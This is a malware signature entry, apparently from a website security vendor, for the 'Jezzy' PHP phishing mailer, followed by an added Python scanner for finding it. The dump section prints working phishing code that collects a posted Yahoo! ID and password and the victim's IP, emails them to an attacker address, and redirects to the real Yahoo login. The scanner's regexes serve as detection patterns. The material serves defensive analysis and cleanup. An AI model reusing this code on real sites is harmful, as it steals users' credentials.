Malware Signatures

php.hacktool.mailer-jezzy.003

Mailers are a category of scripts that hackers install on compromised servers to send out spam and anonymous emails. They take advantage of the servers' bandwidth and other resources to send out tons of spam emails in a short time. Moreover, the headers of such emails don't contain traces of the hackers (they lead to the hacked server), so the whole spam campaign remains quite anonymous. Hacked servers are not a scarce resource, and spammers don't care much if one of them gets blacklisted for spamming: they can easily move to another server. However, to minimize the risk of blacklisting, they usually distribute mailing evenly between several hacked servers.
The so-called Jezzy mailer is part of a phishing tool that sends stolen email credentials to an attacker and then redirects users to a real email service login form (e.g. Yahoo!).

Affecting

Any server with PHP enabled.

Cleanup

This is a phishing tool and can usually be found in deep subdirectories of a hacked site. In most cases you will find some additional phishing files next to it, such as a login form file and some static assets. Make sure to delete them all.
You also need to check whether your domain got blacklisted by phishing blacklist providers (e.g. PhishTank) as a result of the hacker activity.
You can sign up with us and let our team remove the malware for you.

Dump

... excerpts ...
...
$ip = getenv("REMOTE_ADDR");

$message .= "------------------ Yahoo! Rezults --------------n";
$message .= "Yahoo! ID: ".$_POST['login']."n";
$message .= "Yahoo! Password: " .$_POST['passwd']."n";
$message .= "IP: ".$ip."n";
$message .= "----------------- Spammed By JezzyWire --------------n";

$recipient = "jam.....en1957@gmail.com";

$subject = "Y! Logs";
$headers = "From:Amos-Wire@forming.com";
$headers .= $_POST['eMailAdd']."n";
$headers .= "MIME-Version: 1.0n";
$arr=array($recipient);
foreach ($arr as $recipient){$carcabot = mail($recipient,$subject,$message,$headers);}
if ($carcabot)
{
header("Location: http://www.mail.yahoo.com");
}
else
{
echo "ERROR! Please go back and try again.";
}
...
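
A triage sketch for the cleanup step, added here as an example and not part of the original signature: it flags PHP files that combine the three traits visible in the excerpt (a posted password field, a mail() call, and a Location redirect) and lists the files sitting next to each hit so they can be reviewed together. The trait names, the extension list, and the sample web root are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Heuristic traits taken from the excerpt above; a file is flagged only if all three co-occur.
TRAITS = {
    "reads_posted_password": re.compile(
        r"\$_POST\[\s*['\"](?:passwd|password|pass|pwd)['\"]\s*\]", re.I),
    "calls_mail": re.compile(r"\bmail\s*\(", re.I),
    "redirects_after_send": re.compile(r"header\s*\(\s*['\"]Location:\s*https?://", re.I),
}
PHP_EXT = (".php", ".phtml", ".php5", ".inc")  # assumed list of PHP-handled extensions


def scan_file(path):
    """Return the names of the traits found in one file."""
    with open(path, "r", encoding="latin-1") as fh:
        text = fh.read(1_000_000)  # cap the read; these scripts are small
    return {name for name, rx in TRAITS.items() if rx.search(text)}


def scan_tree(root):
    """Map each suspect PHP file to the other files in its directory."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXT):
                continue
            path = os.path.join(dirpath, name)
            if scan_file(path) == set(TRAITS):
                findings[path] = sorted(f for f in files if f != name)
    return findings


def demo():
    """Build a constructed web root (not real data) and scan it."""
    with tempfile.TemporaryDirectory() as root:
        deep = os.path.join(root, "wp-content", "cache", "y")
        os.makedirs(deep)
        samples = {
            os.path.join(deep, "post.php"): '<?php $m = $_POST["passwd"]; '
                'if (mail($to, $s, $m)) { header("Location: http://example.invalid"); }',
            os.path.join(deep, "index.html"): "<form action=post.php></form>",
            os.path.join(root, "contact.php"): '<?php mail($to, "hi", $_POST["msg"]);',
        }
        for path, body in samples.items():
            with open(path, "w", encoding="latin-1") as fh:
                fh.write(body)
        return {os.path.relpath(p, root): sib for p, sib in scan_tree(root).items()}
```

A hit is a lead for manual review, not a verdict: legitimate login handlers can share these traits, and a variant that renames the form fields will not match.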